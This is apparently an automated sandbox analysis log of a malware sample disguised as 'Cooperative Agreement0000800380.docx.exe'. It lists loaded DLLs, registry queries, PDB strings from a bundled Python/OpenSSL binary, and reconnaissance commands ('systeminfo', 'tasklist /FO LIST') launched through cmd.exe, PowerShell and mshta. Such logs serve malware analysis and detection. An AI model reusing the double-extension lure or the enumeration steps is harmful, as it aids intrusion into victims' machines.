                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ucrtbase.pdb source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: chost.exe, 00000011.00000002.2386022109.00007FFE0C0A1000.00000040.00000001.01000000.00000011.sdmp
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
                    Source: Binary string: \4q.pdb source: powershell.exe, 0000004F.00000002.2286266418.0000014E183F7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: chost.exe, 00000011.00000002.2386622767.00007FFE120C1000.00000040.00000001.01000000.00000018.sdmp
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
                    Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: chost.exe, 00000011.00000002.2384746452.00007FFDFF141000.00000040.00000001.01000000.00000019.sdmp
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: chost.exe, 00000011.00000002.2379354062.00007FFDF6EC2000.00000040.00000001.01000000.0000001A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chost.exe, 00000011.00000002.2384507849.00007FFDFB8E1000.00000040.00000001.01000000.0000001C.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chost.exe, 00000011.00000002.2385791832.00007FFE0121E000.00000040.00000001.01000000.00000014.sdmp
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ucrtbase.pdbUGP source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdb source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: chost.exe, 00000011.00000002.2385015786.00007FFDFF6A1000.00000040.00000001.01000000.00000017.sdmp
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: chost.exe, 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdbhP5 source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: chost.exe, 00000010.00000003.2007431242.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: chost.exe
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: chost.exe, 00000011.00000002.2386439853.00007FFE11EA1000.00000040.00000001.01000000.0000001D.sdmp
